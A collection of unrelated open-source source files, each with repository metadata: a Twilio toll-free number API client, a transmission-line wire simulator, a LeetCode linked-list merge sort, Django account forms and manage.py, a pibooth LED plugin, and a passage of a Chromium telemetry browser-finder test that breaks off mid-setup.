        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeList
        """
        super(TollFreeList, self).__init__(version)
        # Path Solution
        self._solution = {'account_sid': account_sid, }
        self._uri = '/Accounts/{account_sid}/IncomingPhoneNumbers/TollFree.json'.format(**self._solution)
    def stream(self, beta=values.unset, friendly_name=values.unset,
               phone_number=values.unset, origin=values.unset, limit=None,
               page_size=None):
        """
        Streams TollFreeInstance records from the API as a generator stream.
        This operation lazily loads records as efficiently as possible until the limit
        is reached.
        The results are returned as a generator, so this operation is memory efficient.
        :param bool beta: Whether to include new phone numbers
        :param unicode friendly_name: A string that identifies the resources to read
        :param unicode phone_number: The phone numbers of the resources to read
        :param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
        :param int limit: Upper limit for the number of records to return. stream()
                          guarantees to never return more than limit. Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records. If no page_size is defined
                              but a limit is defined, stream() will attempt to read the
                              limit with the most efficient page size, i.e. min(limit, 1000)
        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance]
        """
        # Resolve the effective limit/page size, fetch the first page, and
        # let the version object lazily page through the rest.
        limits = self._version.read_limits(limit, page_size)
        page = self.page(
            beta=beta,
            friendly_name=friendly_name,
            phone_number=phone_number,
            origin=origin,
            page_size=limits['page_size'],
        )
        return self._version.stream(page, limits['limit'], limits['page_limit'])
    def list(self, beta=values.unset, friendly_name=values.unset,
             phone_number=values.unset, origin=values.unset, limit=None,
             page_size=None):
        """
        Lists TollFreeInstance records from the API as a list.
        Unlike stream(), this operation is eager and will load `limit` records into
        memory before returning.
        :param bool beta: Whether to include new phone numbers
        :param unicode friendly_name: A string that identifies the resources to read
        :param unicode phone_number: The phone numbers of the resources to read
        :param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
        :param int limit: Upper limit for the number of records to return. list() guarantees
                          never to return more than limit. Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records. If no page_size is defined
                              but a limit is defined, list() will attempt to read the limit
                              with the most efficient page size, i.e. min(limit, 1000)
        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance]
        """
        # Eager variant: drain the stream() generator into a list.
        return list(self.stream(
            beta=beta,
            friendly_name=friendly_name,
            phone_number=phone_number,
            origin=origin,
            limit=limit,
            page_size=page_size,
        ))
    def page(self, beta=values.unset, friendly_name=values.unset,
             phone_number=values.unset, origin=values.unset,
             page_token=values.unset, page_number=values.unset,
             page_size=values.unset):
        """
        Retrieve a single page of TollFreeInstance records from the API.
        Request is executed immediately
        :param bool beta: Whether to include new phone numbers
        :param unicode friendly_name: A string that identifies the resources to read
        :param unicode phone_number: The phone numbers of the resources to read
        :param unicode origin: Include phone numbers based on their origin. By default, phone numbers of all origin are included.
        :param str page_token: PageToken provided by the API
        :param int page_number: Page Number, this value is simply for client state
        :param int page_size: Number of records to return, defaults to 50
        :returns: Page of TollFreeInstance
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
        """
        # Map keyword arguments onto the API's query parameters; values.of()
        # drops any parameter left at values.unset.
        params = values.of({
            'Beta': beta,
            'FriendlyName': friendly_name,
            'PhoneNumber': phone_number,
            'Origin': origin,
            'PageToken': page_token,
            'Page': page_number,
            'PageSize': page_size,
        })
        response = self._version.page(
            'GET',
            self._uri,
            params=params,
        )
        return TollFreePage(self._version, response, self._solution)
    def get_page(self, target_url):
        """
        Retrieve a specific page of TollFreeInstance records from the API.
        Request is executed immediately
        :param str target_url: API-generated URL for the requested results page
        :returns: Page of TollFreeInstance
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
        """
        response = self._version.domain.twilio.request(
            'GET',
            target_url,
        )
        return TollFreePage(self._version, response, self._solution)
    def create(self, phone_number, api_version=values.unset,
               friendly_name=values.unset, sms_application_sid=values.unset,
               sms_fallback_method=values.unset, sms_fallback_url=values.unset,
               sms_method=values.unset, sms_url=values.unset,
               status_callback=values.unset, status_callback_method=values.unset,
               voice_application_sid=values.unset,
               voice_caller_id_lookup=values.unset,
               voice_fallback_method=values.unset, voice_fallback_url=values.unset,
               voice_method=values.unset, voice_url=values.unset,
               identity_sid=values.unset, address_sid=values.unset):
        """
        Create a new TollFreeInstance
        :param unicode phone_number: The phone number to purchase in E.164 format
        :param unicode api_version: The API version to use for incoming calls made to the new phone number
        :param unicode friendly_name: A string to describe the new phone number
        :param unicode sms_application_sid: The SID of the application to handle SMS messages
        :param unicode sms_fallback_method: HTTP method used with sms_fallback_url
        :param unicode sms_fallback_url: The URL we call when an error occurs while executing TwiML
        :param unicode sms_method: The HTTP method to use with sms_url
        :param unicode sms_url: The URL we should call when the new phone number receives an incoming SMS message
        :param unicode status_callback: The URL to send status information to your application
        :param unicode status_callback_method: The HTTP method we should use to call status_callback
        :param unicode voice_application_sid: The SID of the application to handle the new phone number
        :param bool voice_caller_id_lookup: Whether to lookup the caller's name
        :param unicode voice_fallback_method: The HTTP method used with voice_fallback_url
        :param unicode voice_fallback_url: The URL we will call when an error occurs in TwiML
        :param unicode voice_method: The HTTP method used with the voice_url
        :param unicode voice_url: The URL we should call when the phone number receives a call
        :param unicode identity_sid: The SID of the Identity resource to associate with the new phone number
        :param unicode address_sid: The SID of the Address resource associated with the phone number
        :returns: Newly created TollFreeInstance
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
        """
        # Map keyword arguments onto the API's form parameters.
        data = values.of({
            'PhoneNumber': phone_number,
            'ApiVersion': api_version,
            'FriendlyName': friendly_name,
            'SmsApplicationSid': sms_application_sid,
            'SmsFallbackMethod': sms_fallback_method,
            'SmsFallbackUrl': sms_fallback_url,
            'SmsMethod': sms_method,
            'SmsUrl': sms_url,
            'StatusCallback': status_callback,
            'StatusCallbackMethod': status_callback_method,
            'VoiceApplicationSid': voice_application_sid,
            'VoiceCallerIdLookup': voice_caller_id_lookup,
            'VoiceFallbackMethod': voice_fallback_method,
            'VoiceFallbackUrl': voice_fallback_url,
            'VoiceMethod': voice_method,
            'VoiceUrl': voice_url,
            'IdentitySid': identity_sid,
            'AddressSid': address_sid,
        })
        payload = self._version.create(
            'POST',
            self._uri,
            data=data,
        )
        return TollFreeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
    def __repr__(self):
        """
        Provide a friendly representation
        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.TollFreeList>'
class TollFreePage(Page):
    """A single page of TollFreeInstance results (auto-generated by the
    Twilio API definition generator)."""
    def __init__(self, version, response, solution):
        """
        Initialize the TollFreePage
        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param account_sid: The SID of the Account that created the resource
        :returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreePage
        """
        super(TollFreePage, self).__init__(version, response)
        # Path Solution
        self._solution = solution
    def get_instance(self, payload):
        """
        Build an instance of TollFreeInstance
        :param dict payload: Payload response from the API
        :returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
        """
        return TollFreeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
    def __repr__(self):
        """
        Provide a friendly representation
        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.TollFreePage>'
class TollFreeInstance(InstanceResource):
    """A toll-free IncomingPhoneNumber owned by an account.

    Wraps one entry of the REST API payload; every marshaled field is
    exposed as a read-only property below.
    """
    class AddressRequirement(object):
        # Allowed values of the address_requirements property: whether a
        # Twilio Address must be on file to own this number.
        NONE = "none"
        ANY = "any"
        LOCAL = "local"
        FOREIGN = "foreign"
    def __init__(self, version, payload, account_sid):
        """
        Initialize the TollFreeInstance

        :param version: API version this resource was fetched through
        :param payload: decoded JSON response body for one phone number
        :param account_sid: The SID of the Account that created the resource

        :returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
        :rtype: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeInstance
        """
        super(TollFreeInstance, self).__init__(version)
        # Marshaled Properties
        self._properties = {
            'account_sid': payload.get('account_sid'),
            'address_sid': payload.get('address_sid'),
            'address_requirements': payload.get('address_requirements'),
            'api_version': payload.get('api_version'),
            'beta': payload.get('beta'),
            'capabilities': payload.get('capabilities'),
            'date_created': deserialize.rfc2822_datetime(payload.get('date_created')),
            'date_updated': deserialize.rfc2822_datetime(payload.get('date_updated')),
            'friendly_name': payload.get('friendly_name'),
            'identity_sid': payload.get('identity_sid'),
            'phone_number': payload.get('phone_number'),
            'origin': payload.get('origin'),
            'sid': payload.get('sid'),
            'sms_application_sid': payload.get('sms_application_sid'),
            'sms_fallback_method': payload.get('sms_fallback_method'),
            'sms_fallback_url': payload.get('sms_fallback_url'),
            'sms_method': payload.get('sms_method'),
            'sms_url': payload.get('sms_url'),
            'status_callback': payload.get('status_callback'),
            'status_callback_method': payload.get('status_callback_method'),
            'trunk_sid': payload.get('trunk_sid'),
            'uri': payload.get('uri'),
            'voice_application_sid': payload.get('voice_application_sid'),
            'voice_caller_id_lookup': payload.get('voice_caller_id_lookup'),
            'voice_fallback_method': payload.get('voice_fallback_method'),
            'voice_fallback_url': payload.get('voice_fallback_url'),
            'voice_method': payload.get('voice_method'),
            'voice_url': payload.get('voice_url'),
        }
        # Context
        self._context = None
        self._solution = {'account_sid': account_sid, }
    @property
    def account_sid(self):
        """
        :returns: The SID of the Account that created the resource
        :rtype: unicode
        """
        return self._properties['account_sid']
    @property
    def address_sid(self):
        """
        :returns: The SID of the Address resource associated with the phone number
        :rtype: unicode
        """
        return self._properties['address_sid']
    @property
    def address_requirements(self):
        """
        :returns: Whether the phone number requires an Address registered with Twilio.
        :rtype: TollFreeInstance.AddressRequirement
        """
        return self._properties['address_requirements']
    @property
    def api_version(self):
        """
        :returns: The API version used to start a new TwiML session
        :rtype: unicode
        """
        return self._properties['api_version']
    @property
    def beta(self):
        """
        :returns: Whether the phone number is new to the Twilio platform
        :rtype: bool
        """
        return self._properties['beta']
    @property
    def capabilities(self):
        """
        :returns: Indicate if a phone can receive calls or messages
        :rtype: unicode
        """
        return self._properties['capabilities']
    @property
    def date_created(self):
        """
        :returns: The RFC 2822 date and time in GMT that the resource was created
        :rtype: datetime
        """
        return self._properties['date_created']
    @property
    def date_updated(self):
        """
        :returns: The RFC 2822 date and time in GMT that the resource was last updated
        :rtype: datetime
        """
        return self._properties['date_updated']
    @property
    def friendly_name(self):
        """
        :returns: The string that you assigned to describe the resource
        :rtype: unicode
        """
        return self._properties['friendly_name']
    @property
    def identity_sid(self):
        """
        :returns: The SID of the Identity resource associated with number
        :rtype: unicode
        """
        return self._properties['identity_sid']
    @property
    def phone_number(self):
        """
        :returns: The phone number in E.164 format
        :rtype: unicode
        """
        return self._properties['phone_number']
    @property
    def origin(self):
        """
        :returns: The phone number's origin. Can be twilio or hosted.
        :rtype: unicode
        """
        return self._properties['origin']
    @property
    def sid(self):
        """
        :returns: The unique string that identifies the resource
        :rtype: unicode
        """
        return self._properties['sid']
    @property
    def sms_application_sid(self):
        """
        :returns: The SID of the application that handles SMS messages sent to the phone number
        :rtype: unicode
        """
        return self._properties['sms_application_sid']
    @property
    def sms_fallback_method(self):
        """
        :returns: The HTTP method used with sms_fallback_url
        :rtype: unicode
        """
        return self._properties['sms_fallback_method']
    @property
    def sms_fallback_url(self):
        """
        :returns: The URL that we call when an error occurs while retrieving or executing the TwiML
        :rtype: unicode
        """
        return self._properties['sms_fallback_url']
    @property
    def sms_method(self):
        """
        :returns: The HTTP method to use with sms_url
        :rtype: unicode
        """
        return self._properties['sms_method']
    @property
    def sms_url(self):
        """
        :returns: The URL we call when the phone number receives an incoming SMS message
        :rtype: unicode
        """
        return self._properties['sms_url']
    @property
    def status_callback(self):
        """
        :returns: The URL to send status information to your application
        :rtype: unicode
        """
        return self._properties['status_callback']
    @property
    def status_callback_method(self):
        """
        :returns: The HTTP method we use to call status_callback
        :rtype: unicode
        """
        return self._properties['status_callback_method']
    @property
    def trunk_sid(self):
        """
        :returns: The SID of the Trunk that handles calls to the phone number
        :rtype: unicode
        """
        return self._properties['trunk_sid']
    @property
    def uri(self):
        """
        :returns: The URI of the resource, relative to `https://api.twilio.com`
        :rtype: unicode
        """
        return self._properties['uri']
    @property
    def voice_application_sid(self):
        """
        :returns: The SID of the application that handles calls to the phone number
        :rtype: unicode
        """
        return self._properties['voice_application_sid']
    @property
    def voice_caller_id_lookup(self):
        """
        :returns: Whether to lookup the caller's name
        :rtype: bool
        """
        return self._properties['voice_caller_id_lookup']
    @property
    def voice_fallback_method(self):
        """
        :returns: The HTTP method used with voice_fallback_url
        :rtype: unicode
        """
        return self._properties['voice_fallback_method']
    @property
    def voice_fallback_url(self):
        """
        :returns: The URL we call when an error occurs in TwiML
        :rtype: unicode
        """
        return self._properties['voice_fallback_url']
    @property
    def voice_method(self):
        """
        :returns: The HTTP method used with the voice_url
        :rtype: unicode
        """
        return self._properties['voice_method']
    @property
    def voice_url(self):
        """
        :returns: The URL we call when the phone number receives a call
        :rtype: unicode
        """
        return self._properties['voice_url']
    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.TollFreeInstance>'
|
tysonholub/twilio-python
|
twilio/rest/api/v2010/account/incoming_phone_number/toll_free.py
|
Python
|
mit
| 20,610
|
#
# Transmission Line Simulator
#
# Author(s): Jiacong Xu
# Created: Jul-27-2017
#
from util.constants import *
from circuitelement import CircuitElement
import numpy as np
class Wire(CircuitElement):
    """
    Represents a wire. This class allows an arbitrary signal speed and relays
    voltage accordingly.
    """

    def __init__(self, ohm, speed):
        """
        Initializes this wire with given ohm value and speed.

        ohm:    impedence in ohms.
        speed:  speed of wave propagation in c.
        """
        super(Wire, self).__init__()
        self.impedance = ohm
        self.speed = speed

    @staticmethod
    def _reflection_coefficient(r, z):
        """
        Reflection coefficient (r - z) / (r + z) for a boundary between
        impedances z (this wire) and r (the neighbor), or 0 when the sum
        is zero.  float() guards against silent integer truncation when
        both impedances are ints (this was duplicated inline twice before).
        """
        if r + z == 0:
            return 0.0
        return float(r - z) / (r + z)

    def split(self):
        """
        Splits the wave amplitude at each end of the wire into a transmitted
        part and a reflected part according to the impedance mismatch with
        the neighboring element.
        """
        # Splitting forward (right end, against self.next)
        amp = self.forward[-1]
        refl = self._reflection_coefficient(self.next.impedance, self.impedance)
        self.forward[-1] -= refl * amp
        self.backward[-1] += refl * amp

        # Splitting backward (left end, against self.prev)
        amp = self.backward[0]
        refl = self._reflection_coefficient(self.prev.impedance, self.impedance)
        self.backward[0] -= refl * amp
        self.forward[0] += refl * amp

    def rotateForward(self):
        # Shift the forward-travelling wave one cell to the right and pull
        # the incoming sample from the previous element.
        self.forward = np.roll(self.forward, 1)
        self.forward[0] = self.prev.forward[-1]

    def rotateBackward(self):
        # Shift the backward-travelling wave one cell to the left and pull
        # the incoming sample from the next element.
        self.backward = np.roll(self.backward, -1)
        self.backward[-1] = self.next.backward[0]
|
flyingbanana1024102/transmission-line-simulator
|
src/models/wire.py
|
Python
|
mit
| 1,615
|
__source__ = 'https://leetcode.com/problems/sort-list/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/sort-list.py
# Time: O(nlogn)
# Space: O(logn) for stack call
# Sort
#
# Description: Leetcode # 148. Sort List
#
# Sort a linked list in O(n log n) time using constant space complexity.
#
# Related Topics
# Linked List Sort
# Similar Questions
# Merge Two Sorted Lists Sort Colors Insertion Sort List
#
import unittest
class ListNode:
    """A singly-linked list node holding a value and a next pointer."""
    def __init__(self, x):
        self.val = x
        self.next = None

    def __repr__(self):
        # The previous version guarded this with "if self:" and implicitly
        # returned None otherwise -- a TypeError for __repr__.  An instance
        # is always truthy here (no __bool__/__len__), so the guard was dead
        # code and is removed.
        return "{} -> {}".format(self.val, repr(self.next))
class Solution:
    """Top-down merge sort over a singly linked list: O(n log n) time."""
    # @param head, a ListNode
    # @return a ListNode
    def sortList(self, head):
        # A list of zero or one nodes is already sorted.
        if head is None or head.next is None:
            return head
        # Slow/fast pointers find the midpoint; before_mid trails slow so
        # the chain can be severed into two halves.
        before_mid, mid, runner = None, head, head
        while runner is not None and runner.next is not None:
            before_mid, mid, runner = mid, mid.next, runner.next.next
        before_mid.next = None
        # Recursively sort both halves, then merge them.
        sorted_right = self.sortList(mid)
        sorted_left = self.sortList(head)
        return self.mergeTwoLists(sorted_right, sorted_left)

    def mergeTwoLists(self, l1, l2):
        """Merge two sorted lists using a sentinel head (stable: <=)."""
        sentinel = ListNode(0)
        tail = sentinel
        while l1 is not None and l2 is not None:
            if l1.val <= l2.val:
                tail.next, tail, l1 = l1, l1, l1.next
            else:
                tail.next, tail, l2 = l2, l2, l2.next
        # At most one list still has nodes; append it wholesale.
        tail.next = l1 if l1 is not None else l2
        return sentinel.next
# Definition for singly-linked list.
# http://www.cnblogs.com/zuoyuan/p/3699508.html
# http://jelices.blogspot.com/2014/06/leetcode-python-sort-list.html this one implement using merge sort
class SolutionOther:
    """Alternative merge-sort variant: same algorithm, different split point."""
    # @param head, a ListNode
    # @return a ListNode
    def sortList(self, head):
        if head is None or head.next is None:
            return head
        # fast moves two steps per one of slow; slow stops just before the
        # midpoint, which becomes the head of the second half.
        slow = fast = head
        while fast.next and fast.next.next:
            slow = slow.next
            fast = fast.next.next
        second_half = slow.next
        slow.next = None
        first_half = self.sortList(head)
        second_half = self.sortList(second_half)
        return self.merge(first_half, second_half)

    def merge(self, head1, head2):
        """Merge two sorted lists; an empty side short-circuits."""
        if head1 is None:
            return head2
        if head2 is None:
            return head1
        sentinel = ListNode(0)
        tail = sentinel
        while head1 and head2:
            if head1.val < head2.val:
                tail.next = head1
                head1 = head1.next
            else:
                tail.next = head2
                head2 = head2.next
            tail = tail.next
        # Exactly one side can still be non-empty here.
        tail.next = head1 if head1 else head2
        return sentinel.next
# Pre-built linked lists used for ad-hoc experiments:
#   c1 -> c2 -> c3 : 5 -> 1 -> 9
#   a1 -> a2 -> a3 -> a4 : 1 -> 2 -> 3 -> 4
#   b1 : single node 1
c1, c2, c3 = ListNode(5), ListNode(1), ListNode(9)
a1, a2, a3, a4 = ListNode(1), ListNode(2), ListNode(3), ListNode(4)
c1.next, c2.next, c3.next = c2, c3, None
a1.next, a2.next, a3.next = a2, a3, a4
b1 = ListNode(1)
#test
#test
class TestMethods(unittest.TestCase):
    """Smoke test: sort a small linked list and print the result."""

    def test_Local(self):
        self.assertEqual(1, 1)
        # Build the unsorted list 3 -> 4 -> 1 -> 2.
        head = ListNode(3)
        head.next = ListNode(4)
        head.next.next = ListNode(1)
        head.next.next.next = ListNode(2)
        # print(...) is valid in both Python 2 and 3 for a single argument;
        # the old "print expr" statement form was Python-2-only syntax.
        print(Solution().sortList(head))


if __name__ == '__main__':
    unittest.main()
Java = '''
# Thought:
# 7ms 33.52%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null) return head;
if (head.next == null) return head;
//p1 move 1 step every time, p2 move 2 step every time, pre record node before p1
ListNode p1 = head;
ListNode p2 = head;
ListNode pre = head;
while(p2 != null && p2.next != null) {
pre = p1;
p1 = p1.next;
p2 = p2.next.next;
}
//change pre next to null, make two sub list(head to pre, p1 to p2)
pre.next = null;
ListNode h1 = sortList(head);
ListNode h2 = sortList(p1);
return merge(h1, h2);
}
public ListNode merge(ListNode h1, ListNode h2) {
if (h1 == null) return h2;
if (h2 == null) return h1;
if (h1.val < h2.val) {
h1.next = merge(h1.next, h2);
return h1;
}else {
h2.next = merge(h1, h2.next);
return h2;
}
}
}
# Different thinking, similar technique
# 5ms 69.10%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null || head.next == null) return head;
int length = 1;
ListNode cur = head;
while(cur != null) {
length++;
cur = cur.next;
}
int mid = length/2;
cur = head;
while(mid > 1) {
cur = cur.next;
mid--;
}
ListNode newHead = cur.next;
cur.next = null;
ListNode h1 = sortList(head);
ListNode h2 = sortList(newHead);
return merge(h1, h2);
}
public ListNode merge(ListNode h1, ListNode h2) {
if (h1 == null) return h2;
if (h2 == null) return h1;
ListNode head;
if (h1.val < h2.val) {
head = h1;
head.next = merge(h1.next, h2);
}else {
head = h2;
head.next = merge(h1, h2.next); //order should not mater with head pointer, but get stack overflow somehow
}
return head;
}
}
# 4ms 94.54%
class Solution {
public ListNode sortList(ListNode head) {
if (head == null || head.next == null) {
return head;
}
ListNode slow = head;
ListNode fast = head;
while (fast.next != null && fast.next.next != null) {
slow = slow.next;
fast = fast.next.next;
}
ListNode secondHalf = slow.next;
slow.next = null;
ListNode firstHalf = sortList(head);
secondHalf = sortList(secondHalf);
return merge(firstHalf, secondHalf);
}
private ListNode merge(ListNode first, ListNode second) {
ListNode result = new ListNode(0);
ListNode prev = result;
while (first != null && second != null) {
if (first.val < second.val) {
prev.next = first;
prev = prev.next;
first = first.next;
} else {
prev.next = second;
prev = prev.next;
second = second.next;
}
}
while (first != null) {
prev.next = first;
prev = prev.next;
first = first.next;
}
while (second != null) {
prev.next = second;
prev = prev.next;
second = second.next;
}
return result.next;
}
}
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/SortList.py
|
Python
|
apache-2.0
| 6,949
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings unless the caller already set
    # DJANGO_SETTINGS_MODULE in the environment.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tenacious.settings")
    from django.core.management import execute_from_command_line
    # Dispatch whatever management command was given on the command line.
    execute_from_command_line(sys.argv)
|
vzvenyach/tenacious
|
tenacious/manage.py
|
Python
|
mit
| 252
|
from django import forms
from accounts.models import User, Review, Comment
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm
class UserCreationForm(UserCreationForm):
    """Sign-up form extending Django's UserCreationForm with email and avatar."""
    # NOTE(review): this class shadows the imported
    # django.contrib.auth.forms.UserCreationForm it derives from; confirm no
    # other code needs the original name from this module.
    email = forms.EmailField(required=True)    # email is mandatory on sign-up
    avatar = forms.ImageField(required=False)  # profile picture is optional
    class Meta:
        model = User
        fields = ("username", "email", "avatar", "password1", "password2",)
    def save(self, commit=True):
        """Persist the user, copying the extra email/avatar fields onto it."""
        user = super(UserCreationForm, self).save(commit=False)
        user.email = self.cleaned_data["email"]
        user.avatar = self.cleaned_data["avatar"]
        if commit:
            user.save()
        return user
class EditUserForm(ModelForm):
    """Profile-editing form limited to the freely editable profile fields."""
    class Meta:
        model = User
        fields = ("website", "bio", "avatar")
class ReviewForm(ModelForm):
    """Review form; book and user are assigned by the view, not the visitor."""
    class Meta:
        model = Review
        exclude = ("book", "user")
class CommentForm(ModelForm):
    """Comment form; review and user are assigned by the view, not the visitor."""
    class Meta:
        model = Comment
        exclude = ("review", "user")
|
ch3ka/codingcontest2012
|
bookz/accounts/forms.py
|
Python
|
gpl-3.0
| 1,001
|
# -*- coding: utf-8 -*-
import time
import pibooth
class LightsPlugin(object):
    """Plugin to manage the lights via GPIO.

    Each hook below reacts to a pibooth state-machine transition by turning
    the app's LED objects on/off or making them blink.
    """
    def __init__(self, plugin_manager):
        # Keep a reference to the plugin manager (currently unused beyond storage).
        self._pm = plugin_manager
    @pibooth.hookimpl
    def pibooth_startup(self, app):
        # Signal that the application booted successfully.
        app.led_startup.switch_on()
    @pibooth.hookimpl
    def pibooth_cleanup(self, app):
        # Release all LED resources on shutdown.
        app.led_startup.quit()
        app.led_preview.quit()
        app.led_capture.quit()
        app.led_print.quit()
    @pibooth.hookimpl
    def state_wait_enter(self, app):
        app.led_capture.blink()
        # Only invite printing when a picture exists and the printer is usable.
        if app.previous_picture_file and app.printer.is_installed() and not app.printer_unavailable:
            app.led_print.blink()
    @pibooth.hookimpl
    def state_wait_do(self, cfg, app, events):
        if app.find_print_event(events) and app.previous_picture_file and app.printer.is_installed():
            app.led_print.switch_on()
            time.sleep(1)  # Just to let the LED switched on
            # Stop inviting further prints once the duplicate limit is hit
            # or the printer became unavailable.
            if app.nbr_duplicates >= cfg.getint('PRINTER', 'max_duplicates') or app.printer_unavailable:
                app.led_print.switch_off()
            else:
                app.led_print.blink()
    @pibooth.hookimpl
    def state_wait_exit(self, app):
        app.led_capture.switch_off()
        app.led_print.switch_off()
    @pibooth.hookimpl
    def state_choose_enter(self, app):
        # Both choices are available: blink both LEDs.
        app.led_capture.blink()
        app.led_print.blink()
    @pibooth.hookimpl
    def state_choose_exit(self, app):
        # Light only the LED matching the selected capture count.
        if app.capture_nbr == app.capture_choices[0]:
            app.led_capture.switch_on()
            app.led_print.switch_off()
        elif app.capture_nbr == app.capture_choices[1]:
            app.led_print.switch_on()
            app.led_capture.switch_off()
    @pibooth.hookimpl
    def state_chosen_exit(self, app):
        app.led_capture.switch_off()
        app.led_print.switch_off()
    @pibooth.hookimpl
    def state_preview_enter(self, app):
        app.led_preview.switch_on()
    @pibooth.hookimpl
    def state_capture_exit(self, app):
        app.led_preview.switch_off()
    @pibooth.hookimpl
    def state_print_enter(self, app):
        app.led_print.blink()
    @pibooth.hookimpl
    def state_print_do(self, app, events):
        if app.find_print_event(events) and app.previous_picture_file:
            app.led_print.switch_on()
    @pibooth.hookimpl
    def state_print_exit(self, app):
        if app.previous_picture_file:
            app.led_print.blink()
|
werdeil/pibooth
|
pibooth/plugins/lights_plugin.py
|
Python
|
mit
| 2,503
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import browser_options
from telemetry.core.backends.chrome import desktop_browser_finder
from telemetry.unittest import system_stub
# This file verifies the logic for finding a browser instance on all platforms
# at once. It does so by providing stubs for the OS/sys/subprocess primitives
# that the underlying finding logic usually uses to locate a suitable browser.
# We prefer this approach to having to run the same test on every platform on
# which we want this code to work.
class FindTestBase(unittest.TestCase):
  """Base fixture: stubs the os/subprocess/sys primitives the finder uses."""
  def setUp(self):
    self._finder_options = browser_options.BrowserFinderOptions()
    self._finder_options.chrome_root = '../../../'
    self._stubs = system_stub.Override(desktop_browser_finder,
                                       ['os', 'subprocess', 'sys'])

  def tearDown(self):
    self._stubs.Restore()

  @property
  def _files(self):
    # The list of paths the stubbed os pretends exist.
    return self._stubs.os.path.files

  def DoFindAll(self):
    return desktop_browser_finder.FindAllAvailableBrowsers(
        self._finder_options)

  def DoFindAllTypes(self):
    return [browser.browser_type for browser in self.DoFindAll()]

  def CanFindAvailableBrowsers(self):
    return desktop_browser_finder.CanFindAvailableBrowsers()
def has_type(array, browser_type):
  """Return True if any browser in *array* has the given browser_type.

  any() short-circuits on the first match instead of materializing an
  intermediate list just to take its length.
  """
  return any(x.browser_type == browser_type for x in array)
class FindSystemTest(FindTestBase):
  """Windows: system-wide Chrome installs should be reported as 'system'."""
  def setUp(self):
    super(FindSystemTest, self).setUp()
    self._stubs.sys.platform = 'win32'

  def _checkSystemInstall(self, stub_attr, base_dir):
    # Place chrome.exe under base_dir, expose base_dir through the given
    # stubbed os attribute, and expect a 'system' browser to be found.
    if not self.CanFindAvailableBrowsers():
      return
    self._files.append(base_dir + '\\Google\\Chrome\\Application\\chrome.exe')
    setattr(self._stubs.os, stub_attr, base_dir)
    self.assertIn('system', self.DoFindAllTypes())

  def testFindProgramFiles(self):
    self._checkSystemInstall('program_files', 'C:\\Program Files')

  def testFindProgramFilesX86(self):
    self._checkSystemInstall('program_files_x86', 'C:\\Program Files(x86)')

  def testFindLocalAppData(self):
    self._checkSystemInstall('local_app_data', 'C:\\Local App Data')
class FindLocalBuildsTest(FindTestBase):
  """Windows: a Release chrome.exe in any local build dir yields 'release'."""
  def setUp(self):
    super(FindLocalBuildsTest, self).setUp()
    self._stubs.sys.platform = 'win32'

  def _checkBuildDir(self, exe_path):
    # Drop a release binary into the fake filesystem and expect 'release'.
    if not self.CanFindAvailableBrowsers():
      return
    self._files.append(exe_path)
    self.assertIn('release', self.DoFindAllTypes())

  def testFindBuild(self):
    self._checkBuildDir('..\\..\\..\\build\\Release\\chrome.exe')

  def testFindOut(self):
    self._checkBuildDir('..\\..\\..\\out\\Release\\chrome.exe')

  def testFindXcodebuild(self):
    self._checkBuildDir('..\\..\\..\\xcodebuild\\Release\\chrome.exe')
class OSXFindTest(FindTestBase):
  """Mac: every canonical install and local build should be discovered."""
  def setUp(self):
    super(OSXFindTest, self).setUp()
    self._stubs.sys.platform = 'darwin'
    for path in (
        '/Applications/Google Chrome Canary.app/'
        'Contents/MacOS/Google Chrome Canary',
        '/Applications/Google Chrome.app/'
        'Contents/MacOS/Google Chrome',
        '../../../out/Release/Chromium.app/Contents/MacOS/Chromium',
        '../../../out/Debug/Chromium.app/Contents/MacOS/Chromium',
        '../../../out/Release/Content Shell.app/Contents/MacOS/Content Shell',
        '../../../out/Debug/Content Shell.app/Contents/MacOS/Content Shell'):
      self._files.append(path)

  def testFindAll(self):
    if not self.CanFindAvailableBrowsers():
      return
    self.assertEquals(
        set(self.DoFindAllTypes()),
        set(['debug', 'release',
             'content-shell-debug', 'content-shell-release',
             'canary', 'system']))
class LinuxFindTest(FindTestBase):
  """Linux: local builds plus an optional google-chrome on $PATH."""
  def setUp(self):
    super(LinuxFindTest, self).setUp()
    self._stubs.sys.platform = 'linux2'
    for path in ('/foo/chrome',
                 '../../../out/Release/chrome',
                 '../../../out/Debug/chrome',
                 '../../../out/Release/content_shell',
                 '../../../out/Debug/content_shell'):
